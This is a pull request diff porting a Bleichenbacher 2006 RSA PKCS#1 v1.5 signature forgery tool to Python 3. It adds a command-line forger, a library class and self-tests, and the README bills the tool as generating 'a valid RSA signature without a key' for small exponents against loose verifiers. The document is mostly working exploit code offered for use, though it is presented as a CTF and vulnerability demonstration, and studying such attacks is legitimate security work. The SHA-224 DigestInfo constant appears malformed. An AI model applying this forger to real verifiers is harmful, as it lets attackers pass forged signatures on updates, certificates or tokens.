### PR TITLE
Ported to Python3 and other improvements

### DIFF
--- a/Forge.py
+++ b/Forge.py
@@ -1,49 +1,185 @@
 #!/usr/bin/python
 
-import argparse
+"""
+This module gets parameters from the command line and
+passes them to a method of the "SignatureForger" class
+from the "SignatureForger.py".
 
-from HashInfo import *
-from SignatureForger import *
 
-def printOutput(signature):
-  print("****************************************************")
-  print("*         Signature successfully generated!        *")
-  print("****************************************************")
-  print("")
-  print("Signature:")
-  print(hex(signature))
-  print("Plaintext:")
-  print(hex(toInt(signature) ** 3))
+This file is part of Bleichenbacher Signature Forger v2.0.
+
+Copyright 2016 Filippo Valsorda
+Copyright 2017 Peter Hoeg Steffensen
+Copyright 2021 Maxim Masiutin
+
+History:
+
+1.0 (July 2nd, 2017)
+  - Initial version
+
+2.0 (May 5th, 2021)
+  - Ported to Python 3
+  - Removed strings in favor of byte objects
+  - Added support for output formats
+  - Added support for the public exponent command line parameter.
+  - Dynamic precision adjustment for larger numbers
+  - The program exits with an appropriate message if it cannot generate a signature, rather than spinning in an endless loop
+  - The option to specify the number of FF's
+  - The "quiet" option
+  - All error messages are printed to stderr
+  - Approprite exit codes returned
+  - Added module docstrings
+  - Proper "import" declarations that list only classes/functions which are actually imported
+  - Added support for the SHA-224 hash
+  - Implemented automatic unit tests
+
+
+Bleichenbacher Signature Forger is free software: you can redistribute it and/or modify
+it under the terms of the GNU General Public License as published by
+the Free Software Foundation, either version 3 of the License, or
+(at your option) any later version.
+
+Bleichenbacher Signature Forger is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+GNU General Public License for more details.
+
+You should have received a copy of the GNU General Public License
+along with Bleichenbacher Signature Forger.  If not, see <https://www.gnu.org/licenses/>.
+"""
+
+from argparse import ArgumentParser
+from sys import stdout, stderr, argv, exit
+from HashInfo import HASH_ASN1
+from SignatureForger import SignatureForger, toInt
+from base64 import b64encode
+from binascii import hexlify
+
+DefaultPublicExponent = 3
+DefaultFFcount = 1
+DefaultQuiet = False
+DefaultOutputFormat = "base64"
+
+
+def printOutput(arg_signature, arg_format, arg_quiet):
+
+    if not arg_quiet:
+        print("****************************************************")
+        print("*         Signature successfully generated!        *")
+        print("****************************************************")
+        print("")
+        print("Signature:")
+
+    binary_data = None
+    if arg_format == "base64":
+        binary_data = b64encode(arg_signature)
+    elif arg_format == "hex":
+        binary_data = hexlify(arg_signature)
+    elif arg_format == "raw":
+        stdout.buffer.write(arg_signature)
+    elif arg_format == "decimal":
+        print(toInt(arg_signature))
+    else:
+        print("Unknown output format specified " + arg_format, file=stderr)
+
+    if binary_data is not None:
+        print(binary_data.decode("ascii"))
 
 
 def getArguments():
-  parser = argparse.ArgumentParser(description="Signature forger for RSA PKCS1v1.5 given that the exponent 3 is used and the verification algorithm is not implemented properly")
+    parser = ArgumentParser(
+        description="Bleichenbacher Signature Forger. "
+        + "Version 2.0. "
+        + "This program demonstrates the vulenrability of the RSA PKCS1v1.5 and the attack when public exponent is small (e.g., 3) and the verification algorithm is not implemented properly."
+    )
 
-  parser.add_argument("-k", "--keysize", type=int)
-  parser.add_argument("-ha", "--hashalg", action="store", type=str, choices=list(HASH_ASN1.keys()))
-  parser.add_argument("-va", "--variant", type=int, choices=[1,2])
-  parser.add_argument("-of", "--outputformat", type=str, choices=["hex", "base64", "raw"])
-  parser.add_argument("-m", "--message", type=str)
+    parser.add_argument("-k", "--keysize", type=int, required=True)
+    parser.add_argument(
+        "-ha",
+        "--hashalg",
+        action="store",
+        type=str,
+        choices=list(HASH_ASN1.keys()),
+        required=True,
+    )
+    parser.add_argument(
+        "-va",
+        "--variant",
+        type=int,
+        choices=[1, 2],
+        help="1 - 00 01 FF ... 00 ASN.1 HASH GarbageWithZeros;  2 - 00 01 FF NonzeroGarbage 00 ASN.1 HASH",
+        required=True,
+    )
+    parser.add_argument(
+        "-of",
+        "--outputformat",
+        type=str,
+        choices=["decimal", "hex", "base64", "raw"],
+        default=DefaultOutputFormat,
+    )
+    parser.add_argument("-m", "--message", type=str, required=True)
+    parser.add_argument(
+        "-e", "--public-exponent", type=int, default=DefaultPublicExponent
+    )
+    parser.add_argument("-F", "--ffcount", type=int, default=DefaultFFcount)
+    parser.add_argument("-q", "--quiet", action="store_true")
 
-  args = parser.parse_args()
-  return args
+    if len(argv) == 1:
+        parser.print_help(stderr)
+        exit(1)
 
-if __name__ == "__main__":
+    ret_args = parser.parse_args()
 
-  args = getArguments()
+    return ret_args
 
-  keySize = args.keysize
-  hashAlg = args.hashalg
 
-  signatureForger = SignatureForger(keySize, hashAlg)
+args = getArguments()
 
-  signature = ""
+quiet = args.quiet
 
-  if args.variant == 1:
-    signature = signatureForger.forgeSignature_method1(args.message)
-  elif args.variant == 2:
-    signature = signatureForger.forgeSignature_method2(args.message)
-  else:
-    raise Exception("Unsupported signature method") 
+if quiet is None:
+    quiet = DefaultQuiet
 
-  printOutput(signature)
+keySize = args.keysize
+hashAlg = args.hashalg
+ffcount = args.ffcount
+if ffcount is None:
+    ffcount = DefaultFFcount
+
+public_exponent = args.public_exponent
+if public_exponent is None:
+    public_exponent = DefaultPublicExponent
+
+if public_exponent is None:
+    public_exponent = DefaultPublicExponent
+
+if keySize is None:
+    print("Please specify the key size", file=stderr)
+    exit(1)
+
+signatureForger = SignatureForger(keySize, hashAlg, public_exponent, ffcount, quiet)
+
+signature = None
+
+if args.variant == 1:
+    signature = signatureForger.forgeSignature_method_garbage_end(args.message)
+elif args.variant == 2:
+    signature = signatureForger.forgeSignature_method_garbage_mid(args.message)
+else:
+    print(
+        "Unsupported signature method. Choose '--variant 1' or '--variant 2'",
+        file=stderr,
+    )
+    exit(1)
+
+of = args.outputformat
+if of is None:
+    of = DefaultOutputFormat
+if signature is None:
+    print("Cannot generate the signature.", end="", file=stderr)
+    if (public_exponent <= 3) and (keySize < 4096):
+        print(" (Key size is too small?)", end="", file=stderr)
+    print("", file=stderr)
+    exit(2)
+else:
+    printOutput(signature, of, quiet)

--- a/HashInfo.py
+++ b/HashInfo.py
@@ -1,33 +1,57 @@
 #!/usr/bin/python
 
-import hashlib
+"""
+This file is part of Bleichenbacher Signature Forger v2.0.
+
+Copyright 2016 Filippo Valsorda
+Copyright 2017 Peter Hoeg Steffensen
+Copyright 2021 Maxim Masiutin
+
+Bleichenbacher Signature Forger is free software: you can redistribute it and/or modify
+it under the terms of the GNU General Public License as published by
+the Free Software Foundation, either version 3 of the License, or
+(at your option) any later version.
+
+Bleichenbacher Signature Forger is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+GNU General Public License for more details.
+
+You should have received a copy of the GNU General Public License
+along with Bleichenbacher Signature Forger.  If not, see <https://www.gnu.org/licenses/>.
+"""
+
+from hashlib import md5, sha1, sha224, sha256, sha384, sha512
 
 HASH_ASN1 = {
-'MD5': b'\x30\x20\x30\x0c\x06\x08\x2a\x86\x48\x86\xf7\x0d\x02\x05\x05\x00\x04\x10',
-'SHA-1': b'\x30\x21\x30\x09\x06\x05\x2b\x0e\x03\x02\x1a\x05\x00\x04\x14',
-'SHA-256': b'\x30\x31\x30\x0d\x06\x09\x60\x86\x48\x01\x65\x03\x04\x02\x01\x05\x00\x04\x20',
-'SHA-384': b'\x30\x41\x30\x0d\x06\x09\x60\x86\x48\x01\x65\x03\x04\x02\x02\x05\x00\x04\x30',
-'SHA-512': b'\x30\x51\x30\x0d\x06\x09\x60\x86\x48\x01\x65\x03\x04\x02\x03\x05\x00\x04\x40',
+    "MD5": b"\x30\x20\x30\x0c\x06\x08\x2a\x86\x48\x86\xf7\x0d\x02\x05\x05\x00\x04\x10",
+    "SHA-1": b"\x30\x21\x30\x09\x06\x05\x2b\x0e\x03\x02\x1a\x05\x00\x04\x14",
+    "SHA-224": b"\x30\x51\x30\x0d\x06\x09\x60\x86\x48\x01\x65\x03\x04\x02\x04\x05\x00\x04\x1C",
+    "SHA-256": b"\x30\x31\x30\x0d\x06\x09\x60\x86\x48\x01\x65\x03\x04\x02\x01\x05\x00\x04\x20",
+    "SHA-384": b"\x30\x41\x30\x0d\x06\x09\x60\x86\x48\x01\x65\x03\x04\x02\x02\x05\x00\x04\x30",
+    "SHA-512": b"\x30\x51\x30\x0d\x06\x09\x60\x86\x48\x01\x65\x03\x04\x02\x03\x05\x00\x04\x40",
 }
 
+
 class Hash:
-
-	def __init__(self, hashAlg):
-		if hashAlg == "MD5":
-			self.digestInfo = HASH_ASN1[hashAlg]
-			self.digester = hashlib.md5
-		elif hashAlg == "SHA-1":
-			self.digestInfo = HASH_ASN1[hashAlg]
-			self.digester = hashlib.sha1
-		elif hashAlg == "SHA-256":
-			self.digestInfo = HASH_ASN1[hashAlg]
-			self.digester = hashlib.sha256
-		elif hashAlg == "SHA-384":
-			self.digestInfo = HASH_ASN1[hashAlg]
-			self.digester = hashlib.sha384
-		elif hashAlg == "SHA-512":
-			self.digestInfo = HASH_ASN1[hashAlg]
-			self.digester = hashlib.sha512
-		else:
-			raise Exception("Invalid hash algorithm identifier provided")
-
+    def __init__(self, hashAlg):
+        if hashAlg == "MD5":
+            self.digestInfo = HASH_ASN1[hashAlg]
+            self.digester = md5
+        elif hashAlg == "SHA-1":
+            self.digestInfo = HASH_ASN1[hashAlg]
+            self.digester = sha1
+        elif hashAlg == "SHA-224":
+            self.digestInfo = HASH_ASN1[hashAlg]
+            self.digester = sha224
+        elif hashAlg == "SHA-256":
+            self.digestInfo = HASH_ASN1[hashAlg]
+            self.digester = sha256
+        elif hashAlg == "SHA-384":
+            self.digestInfo = HASH_ASN1[hashAlg]
+            self.digester = sha384
+        elif hashAlg == "SHA-512":
+            self.digestInfo = HASH_ASN1[hashAlg]
+            self.digester = sha512
+        else:
+            raise Exception("Invalid hash algorithm identifier provided")

--- a/README.md
+++ b/README.md
@@ -1,41 +1,71 @@
-# BleichenbacherSignatureForger
-Forge PKCS1v1.5 signature for questionable implementation of verification algorithms...
+# Bleichenbacher BB'06 RSA Signature Tool
 
-Intro
------
+Generate a valid RSA signature without a key.
 
-This repository contains a Python 2 implementation of the Bleichenbacher signature forgery attack. Having seen this variant of the attack multiple times during the last year both in CTFs and in real implementations showed the need for a more general solution than the hacky frankenstein scripts I have laying around.
+## Intro
 
-Attack
-------
+This repository contains a Python 3 implementation of the Bleichenbacher signature forgery attack, described in 2006 (BB'06 attack). Having seen this variant of the attack multiple times during the last year both in CTFs and in real implementations showed the need for a more general solution than the hacky frankenstein scripts, Peter Hoeg Steffensen have laying around. Maxim Masiutin has updated this tool to solve a challenge published in 2020 on an Information Security learning platform, to generate a signature for a key of 2736 bits (e=3) without having the private key. Public modulus (N) is also not needed for the BB'06 signature generation.
 
-PKCS1v15 is defined in https://www.ietf.org/rfc/rfc3447.txt. If the verification algorithm is trying to parse the result of the public key operation instead of building the expected data and comparing it to the result of the public key operation there is a possibility that it might be vulnerable to this attack.
+## Attack
 
-Two variants of the attack is supported:
-1. The length is not checked and a the padding is on the form ``0001FFFFFFFFFFFFFFFF00 | DigestInfo | garbage``
-2. The filler (PS) is not checked - ``0001FFFFFFFFFFFFFFFF | garbage | 00 | DigestInfo``
+PKCS1v15 is defined in <https://www.ietf.org/rfc/rfc3447.txt>. If the verification algorithm is trying to parse the result of the public key operation instea>
 
-More info on variant 1. can be found at: https://www.ietf.org/mail-archive/web/openpgp/current/msg00999.html
+Two variants of the attack are supported:
 
-Credit for variant 2. goes to Fillipo Valsorda (https://blog.filippo.io/bleichenbacher-06-signature-forgery-in-python-rsa/)
+1. The length is not checked, and the padding is on the form ``0001FF...FF00 | DigestInfo | garbage``
+2. The filler (PS) is not checked - ``0001FF...FF | non-zero-garbage | 00 | DigestInfo``
 
-Usage
------
+More info on variant 1 can be found at: <https://www.ietf.org/mail-archive/web/openpgp/current/msg00999.html>
 
-```$ python Forge.py --help
-usage: Forge.py [-h] [-k KEYSIZE] [-ha {SHA-384,SHA-256,SHA-512,SHA-1,MD5}]
-                [-m MESSAGE]
+Credit for variant 2 goes to Filippo Valsorda, who published the original version of the code in 2016 (<https://blog.filippo.io/bleichenbacher-06-signature-for>
 
-Signature forger for RSA PKCS1v1.5 given that the exponent 3 is used and the
-verification algorithm is not implemented properly
+Since a signature in the BB'06 attack never wraps past modulus, we do not need a modulus, i.e., a full public key, to verify a signature. We only need the exponent part of the public key. The BB'06 signatures are valid of any public key, provided that the exponent matches (usually 3).
+## Usage
+
+```
+$ python Forge.py --help
+
+usage: Forge.py [-h] [-k KEYSIZE] [-ha {MD5,SHA-1,SHA-256,SHA-384,SHA-512}] [-va {1,2}] [-of {decimal,hex,base64,raw}] [-m MESSAGE] [-e PUBLIC_EXPONENT] [-F FFCOUNT] [-q]
+
+Bleichenbacher Signature Forger. Version 2.0. This program demonstrates the vulenrability of the RSA PKCS1v1.5 and the attack when public exponent is small (e.g., 3) and the verification
+algorithm is not implemented properly.
 
 optional arguments:
   -h, --help            show this help message and exit
   -k KEYSIZE, --keysize KEYSIZE
-  -ha {SHA-384,SHA-256,SHA-512,SHA-1,MD5}, --hashalg {SHA-384,SHA-256,SHA-512,SHA-1,MD5}
+  -ha {MD5,SHA-1,SHA-256,SHA-384,SHA-512}, --hashalg {MD5,SHA-1,SHA-256,SHA-384,SHA-512}
+  -va {1,2}, --variant {1,2}
+                        1 - 00 01 FF ... 00 ASN.1 HASH GarbageWithZeros; 2 - 00 01 FF NonzeroGarbage 00 ASN.1 HASH
+  -of {decimal,hex,base64,raw}, --outputformat {decimal,hex,base64,raw}
   -m MESSAGE, --message MESSAGE
-  ```
+  -e PUBLIC_EXPONENT, --public-exponent PUBLIC_EXPONENT
+  -F FFCOUNT, --ffcount FFCOUNT
+  -q, --quiet
+```
+## Example
+```
+./Forge.py --keysize 2048 -ha SHA-256 --variant 2 --message "Test"
+```
 
-Will update Soon<sup>TM</sup>
+## History
 
-<sub>plz use PSS</sub>
+- 1.0 (July 2nd, 2017)
+  - Initial version
+
+- 2.0 (May 5th, 2021)
+  - Ported to Python 3
+  - Removed strings in favor of byte objects
+  - Added support for output formats
+  - Added support for the public exponent command line parameter
+  - Dynamic precision adjustment for larger numbers
+  - The program exits with an appropriate message if it cannot generate a signature, rather than spinning in an endless loop
+  - The option to specify the number of FF's
+  - The "quiet" option
+  - All error messages are printed to stderr
+  - Approprite exit codes returned
+  - Added module docstrings
+  - Proper "import" declarations that list only classes/functions which are actually imported
+  - Added support for the SHA-224 hash
+  - Implemented automatic unit tests
+
+

--- a/SelfTest.py
+++ b/SelfTest.py
@@ -1,0 +1,73 @@
+#!/usr/bin/python
+
+"""
+This unit generates test signatures and then verifies them.
+It generates signatures for both variants of the signature format and
+with various key sizes and exponents (3, 5, 7). Since a signature in the
+BB'06 attack never wraps past modulus, we do not need a modulus, i.e.,
+a full public key, to verify a signature. We only need the exponent part
+of the public key. The BB'06 signatures are valid of any public key, provided
+that the exponent matches (usually 3).
+
+
+
+This file is part of Bleichenbacher Signature Forger v2.0.
+
+Copyright 2021 Maxim Masiutin
+
+Bleichenbacher Signature Forger is free software you can redistribute it and/or modify
+it under the terms of the GNU General Public License as published by
+the Free Software Foundation, either version 3 of the License, or
+(at your option) any later version.
+
+Bleichenbacher Signature Forger is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+GNU General Public License for more details.
+
+You should have received a copy of the GNU General Public License
+along with Bleichenbacher Signature Forger.  If not, see <https//www.gnu.org/licenses/>.
+"""
+
+from sys import exit, stderr
+from SignatureForger import SignatureForger, toInt, toBytes
+
+FFCOUNT = 1
+QUIET = True
+MESSAGE = "Test"
+
+
+def verify(variant, hash_alg, key_size, public_exponent):
+    signatureForger = SignatureForger(
+        key_size, hash_alg, public_exponent, FFCOUNT, QUIET
+    )
+    sbin = signatureForger.forgeSignature(MESSAGE, variant)
+    suffix = signatureForger.encodePkcs1Suffix(MESSAGE)
+    if sbin is None:
+        return False
+    s = toInt(sbin)
+    o = pow(s, public_exponent)
+    # Verify the signature - we do not need a modulus here since it should never wrap past the modulus
+    obin = toBytes(o, (o.bit_length() + 7) // 8)
+    if variant == 2:
+        return obin[-len(suffix) :] == suffix
+    else:
+        return suffix in obin
+
+
+if (
+    verify(2, "MD5", 1024, 3)
+    and verify(2, "MD5", 1504, 5)
+    and verify(2, "MD5", 1024, 3)
+    and verify(2, "SHA-256", 1312, 3)
+    and verify(2, "SHA-512", 2048, 3)
+    and verify(1, "MD5", 1024, 3)
+    and verify(1, "MD5", 4096, 5)
+    and verify(1, "MD5", 5120, 7)
+    and verify(1, "SHA-512", 4096, 5)
+):
+    print("Tests passed")
+    exit(0)
+else:
+    print("Test failed", file=stderr)
+    exit(1)

--- a/SignatureForger.py
+++ b/SignatureForger.py
@@ -1,100 +1,227 @@
 #!/usr/bin/python
 
-import binascii
-import hashlib
-import gmpy2
-import os
+"""
+This file is a library unit that exposes the "SignatureForger" class
+with two main methods:
+"forgeSignature_method_garbage_mid" and
+"forgeSignature_method_garbage_end".
 
-from HashInfo import *
+You should specify the public key when initializing the class.
+Then call one of these methods with a message argument, and it will
+return a valid signature of the given message without having a private key.
 
-from decimal import Decimal, getcontext
+You can find the code that uses this class in the "Forge.py" module:
+it gets the key, message and other arguments from the command line
+and prints the generated signature.
 
-keysize = 1024
+
+This file is part of Bleichenbacher Signature Forger v2.0.
+
+Copyright 2016 Filippo Valsorda
+Copyright 2017 Peter Hoeg Steffensen
+Copyright 2021 Maxim Masiutin
+
+Bleichenbacher Signature Forger is free software: you can redistribute it and/or modify
+it under the terms of the GNU General Public License as published by
+the Free Software Foundation, either version 3 of the License, or
+(at your option) any later version.
+
+Bleichenbacher Signature Forger is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+GNU General Public License for more details.
+
+You should have received a copy of the GNU General Public License
+along with Bleichenbacher Signature Forger.  If not, see <https://www.gnu.org/licenses/>.
+"""
+
+from sys import stderr, exit
+from os import urandom
+from gmpy2 import get_max_precision, get_context, root
+from HashInfo import Hash
+
 
 def getBitAt(idx, val):
-  return (val >> idx) & 0x01
+    return (val >> idx) & 0x01
+
 
 def setBitAt(idx, val):
-  return val | (0x01 << idx)
+    return val | (0x01 << idx)
+
 
 def toInt(val):
-  return int(val.encode("hex"), 16)
+    return int.from_bytes(val, byteorder="big")
 
-def toBytes(val):
-  hexVal = hex(val)[2:-1]
-  if len(hexVal) % 2 == 1:
-    hexVal = "0"+hexVal
-  return hexVal.decode("hex")
+
+def toBytes(val, arg_len):
+    return int.to_bytes(val, length=arg_len, byteorder="big")
+
 
 class SignatureForger:
+    def __init__(self, keysize, hashAlg, public_exponent, ffcount, quiet):
+        self.keysize_bytes = (keysize + 7) // 8
+        self.keysize_bits = keysize
+        self.hashAlg = Hash(hashAlg)
+        self.public_exponent = public_exponent
+        self.max_precision = None
+        self.ffcount = ffcount
+        self.quiet = quiet
 
-  def __init__(self, keysize, hashAlg):
-    self.keysize = keysize
-    self.hashAlg = Hash(hashAlg)
+    def limit_precision(self, aprecision):
+        if self.max_precision is None:
+            self.max_precision = get_max_precision() - 16
+        return min(
+            min(aprecision, self.keysize_bits * 128 * self.public_exponent),
+            self.max_precision,
+        )
 
-  def encodePkcs1Suffix(self, message):
-    messageHash = self.hashAlg.digester(message).digest()
-    if ord(messageHash[-1]) & 0x01 != 0x01:
-      print("Hash value must be uneven. Try a different message")
-      exit()
-    suffix = "\x00" + self.hashAlg.digestInfo + messageHash
-    return suffix
-  
-  def constructSignatureSuffix(self, suffix):
-    signatureSuffix = 1
-    for idx in range(len(suffix) * 8):
-      if getBitAt(idx, signatureSuffix ** 3) != getBitAt(idx, toInt(suffix)):
-        signatureSuffix = setBitAt(idx, signatureSuffix)
-    return toBytes(signatureSuffix)
+    def encodePkcs1Suffix(self, message):
+        messageHash = self.hashAlg.digester(message.encode("utf-8")).digest()
+        if messageHash[-1] & 0x01 != 0x01:
+            print(
+                "Hash value must be uneven. Try a different message or a different hash algorithm",
+                file=stderr,
+            )
+            exit(1)
+        suffix = bytes([0]) + self.hashAlg.digestInfo + messageHash
+        return suffix
 
-  def addPrefixToSignature(self, signatureSuffix):
-    prefix = "\x00\x01"
-    prefix += "\xFF"*8
-    while True:
-      testPrefix = prefix + os.urandom((self.keysize/8) - (len(prefix)))
-      signatureCandidate = toBytes(int(gmpy2.cbrt(toInt(testPrefix))))[:-len(signatureSuffix)] + signatureSuffix
-      toCheck = toBytes(toInt(signatureCandidate) ** 3)
-      if "\x00" not in toCheck[:-len(signatureSuffix)]:
-        return signatureCandidate
+    def constructSignatureSuffix(self, suffix):
+        signatureSuffix = 1
+        int_suffix = toInt(suffix)
+        for idx in range(len(suffix) * 8):
+            if getBitAt(idx, pow(signatureSuffix, self.public_exponent)) != getBitAt(
+                idx, int_suffix
+            ):
+                signatureSuffix = setBitAt(idx, signatureSuffix)
+        return toBytes(signatureSuffix, (signatureSuffix.bit_length() + 7) // 8)
 
+    def report_small(self, pbl):
+        print(
+            "Key size is too small or the exponent is too big: the exponentiation of the signature gives",
+            pbl,
+            "bis and wraps past the modulus of",
+            self.keysize_bits,
+            "bits",
+            file=stderr,
+        )
 
-  def forgeSignature_method1(self, message):
-    suffix = self.encodePkcs1Suffix(message)
-    signatureSuffix = self.constructSignatureSuffix(suffix)
-    signature = self.addPrefixToSignature(signatureSuffix)
-    return signature
+    def addPrefixToSignature(self, signatureSuffix):
+        progress = False
+        precision = (self.keysize_bits + 7) // 16
+        attempts = 0
+        prefix = bytes([0x00, 0x01])
+        prefix = prefix + ((bytes([0xFF])) * self.ffcount)
+        while True:
+            get_context().precision = self.limit_precision(precision)
+            attempts += 1
+            testPrefix = prefix + urandom(self.keysize_bytes - len(prefix))
+            signatureCandidate = (
+                toBytes(
+                    self.nthroot(
+                        self.public_exponent,
+                        toInt(testPrefix),
+                        self.limit_precision(precision),
+                    ),
+                    self.keysize_bytes,
+                )[: -len(signatureSuffix)]
+                + signatureSuffix
+            )
+            sc = toInt(signatureCandidate)
+            p = pow(sc, self.public_exponent)
+            pbl = p.bit_length()
+            if pbl > self.keysize_bits:
+                self.report_small(pbl)
+                return None
 
-  def nthroot (self, n, A, precision=300):
-    getcontext().prec = precision
-   
-    n = Decimal(n)
-    x_0 = A / n #step 1: make a while guess.
-    x_1 = 1     #need it to exist before step 2
-    while True:
-      #step 2:
-      x_0, x_1 = x_1, (1 / n)*((n - 1)*x_0 + (A / (x_0 ** (n - 1))))
-      if x_0 == x_1:
-        return x_1
+            toCheck = toBytes(p, (pbl + 7) // 8)
+            if 0 not in toCheck[: -len(signatureSuffix)]:
+                if progress:
+                    if not self.quiet:
+                        print("")
+                if attempts > 1:
+                    if not self.quiet:
+                        print("Found in", attempts, "attempt(s)")
+                return signatureCandidate
+            precision = precision + ((precision + 3) // 4)
+            if attempts == 10:
+                progress = True
+                if not self.quiet:
+                    print("Generating the signature", end="", flush=True)
+            if attempts > 10:
+                if not self.quiet:
+                    print(".", end="", flush=True)
+            if attempts > 100 * self.public_exponent:
+                if progress:
+                    if not self.quiet:
+                        print("")
+                return None
 
-  def forgeSignature_method2(self, message, psLength=8):
-    prefix = "\x00\x01"
-    prefix += "\xFF"*psLength
-    suffix = self.encodePkcs1Suffix(message)
-    plain = prefix + suffix + "\x00"*((self.keysize/8)-(len(prefix) + len(suffix)))
-    signature = toBytes(int(self.nthroot(3, toInt(plain)))+1)
-    return signature
+    def nthroot(self, e, A, prec):
+        get_context().precision = prec
+        tu = root(A, e)
+        return int(tu)
 
-if __name__ == "__main__":
-  message = "WhAAASDAatWhatInTheButt"
-  signatureForger = SignatureForger(1024, "SHA-1", 1)
-  #signature = signatureForger.forgeSignature_method1(message)
-  signature = signatureForger.forgeSignature_method2(message)
-  print(hex(toInt(signature) ** 3))
-  
-'''
-output format: raw, hex, base64
-keysize: raw, from public key
-hash algo, md5, sha1, sha256, sha384, sha512
-message to sign: ascii, hex, base64
-'''
+    def forgeSignature_method_garbage_end(self, message):
+        """
+        Get message of type 'string' and return signature of type 'binary'.
+        The signagure is generated according to the variant 1, with the garbage at the end of the message.
+        The length is not checked and the padding is on the form ``0001FF...FF00 | DigestInfo | garbage``
+        More info on variant 1 can be found at: <https://www.ietf.org/mail-archive/web/openpgp/current/msg00999.html>"""
+        attempts = 0
+        prefix = bytes([0x00, 0x01])
+        prefix = prefix + ((bytes([0xFF])) * self.ffcount)
+        suffix = self.encodePkcs1Suffix(message)
+        value = prefix + suffix
+        numzeros = self.keysize_bytes - len(value)
+        if numzeros < 1:
+            print("The key size is too small", file=stderr)
+            return None
+        plain = value + (bytes([0]) * numzeros)
+        plain_int = toInt(plain)
+        precision = len(value) * 8
+        while True:
+            attempts += 1
+            signature = self.nthroot(
+                self.public_exponent, plain_int, self.limit_precision(precision)
+            )
+            plain2 = pow(signature, self.public_exponent)
+            pbl = plain2.bit_length()
+            if pbl > self.keysize_bits:
+                self.report_small(pbl)
+                return None
 
+            plain2_bytes = toBytes(plain2, self.keysize_bits)
+            if value in plain2_bytes:
+                break
+            if not self.quiet:
+                print("Trying to raise precision...")
+            precision = precision * 2
+            if attempts > 4:
+                return None
+
+        signature_bytes = (signature.bit_length() + 7) // 8
+        return toBytes(signature, signature_bytes)
+
+    def forgeSignature_method_garbage_mid(self, message):
+        """
+        Get message of type 'string' and return signature of type 'binary'.
+        The signagure is generated according to the variant 2, with the garbage in the middle of the message.
+        The filler (PS) is not checked - ``0001FF...FF | non-zero-garbage | 00 | DigestInfo``
+        Credit for the variant 2 goes to Filippo Valsorda who publihed
+        the original version of the code in 2016 (<https://blog.filippo.io/bleichenbacher-06-signature-forgery-in-python-rsa/>)
+        """
+        suffix = self.encodePkcs1Suffix(message)
+        signatureSuffix = self.constructSignatureSuffix(suffix)
+        signature = self.addPrefixToSignature(signatureSuffix)
+        return signature
+
+    def forgeSignature(self, message, variant):
+        if variant == 1:
+            return self.forgeSignature_method_garbage_end(message)
+        elif variant == 2:
+            return self.forgeSignature_method_garbage_mid(message)
+        else:
+            raise ValueError(
+                "The value of the 'variant' parameter should be either 1 or 2"
+            )

--- a/license.txt
+++ b/license.txt
@@ -1,0 +1,674 @@
+                    GNU GENERAL PUBLIC LICENSE
+                       Version 3, 29 June 2007
+
+ Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+                            Preamble
+
+  The GNU General Public License is a free, copyleft license for
+software and other kinds of works.
+
+  The licenses for most software and other practical works are designed
+to take away your freedom to share and change the works.  By contrast,
+the GNU General Public License is intended to guarantee your freedom to
+share and change all versions of a program--to make sure it remains free
+software for all its users.  We, the Free Software Foundation, use the
+GNU General Public License for most of our software; it applies also to
+any other work released this way by its authors.  You can apply it to
+your programs, too.
+
+  When we speak of free software, we are referring to freedom, not
+price.  Our General Public Licenses are designed to make sure that you
+have the freedom to distribute copies of free software (and charge for
+them if you wish), that you receive source code or can get it if you
+want it, that you can change the software or use pieces of it in new
+free programs, and that you know you can do these things.
+
+  To protect your rights, we need to prevent others from denying you
+these rights or asking you to surrender the rights.  Therefore, you have
+certain responsibilities if you distribute copies of the software, or if
+you modify it: responsibilities to respect the freedom of others.
+
+  For example, if you distribute copies of such a program, whether
+gratis or for a fee, you must pass on to the recipients the same
+freedoms that you received.  You must make sure that they, too, receive
+or can get the source code.  And you must show them these terms so they
+know their rights.
+
+  Developers that use the GNU GPL protect your rights with two steps:
+(1) assert copyright on the software, and (2) offer you this License
+giving you legal permission to copy, distribute and/or modify it.
+
+  For the developers' and authors' protection, the GPL clearly explains
+that there is no warranty for this free software.  For both users' and
+authors' sake, the GPL requires that modified versions be marked as
+changed, so that their problems will not be attributed erroneously to
+authors of previous versions.
+
+  Some devices are designed to deny users access to install or run
+modified versions of the software inside them, although the manufacturer
+can do so.  This is fundamentally incompatible with the aim of
+protecting users' freedom to change the software.  The systematic
+pattern of such abuse occurs in the area of products for individuals to
+use, which is precisely where it is most unacceptable.  Therefore, we
+have designed this version of the GPL to prohibit the practice for those
+products.  If such problems arise substantially in other domains, we
+stand ready to extend this provision to those domains in future versions
+of the GPL, as needed to protect the freedom of users.
+
+  Finally, every program is threatened constantly by software patents.
+States should not allow patents to restrict development and use of
+software on general-purpose computers, but in those that do, we wish to
+avoid the special danger that patents applied to a free program could
+make it effectively proprietary.  To prevent this, the GPL assures that
+patents cannot be used to render the program non-free.
+
+  The precise terms and conditions for copying, distribution and
+modification follow.
+
+                       TERMS AND CONDITIONS
+
+  0. Definitions.
+
+  "This License" refers to version 3 of the GNU General Public License.
+
+  "Copyright" also means copyright-like laws that apply to other kinds of
+works, such as semiconductor masks.
+
+  "The Program" refers to any copyrightable work licensed under this
+License.  Each licensee is addressed as "you".  "Licensees" and
+"recipients" may be individuals or organizations.
+
+  To "modify" a work means to copy from or adapt all or part of the work
+in a fashion requiring copyright permission, other than the making of an
+exact copy.  The resulting work is called a "modified version" of the
+earlier work or a work "based on" the earlier work.
+
+  A "covered work" means either the unmodified Program or a work based
+on the Program.
+
+  To "propagate" a work means to do anything with it that, without
+permission, would make you directly or secondarily liable for
+infringement under applicable copyright law, except executing it on a
+computer or modifying a private copy.  Propagation includes copying,
+distribution (with or without modification), making available to the
+public, and in some countries other activities as well.
+
+  To "convey" a work means any kind of propagation that enables other
+parties to make or receive copies.  Mere interaction with a user through
+a computer network, with no transfer of a copy, is not conveying.
+
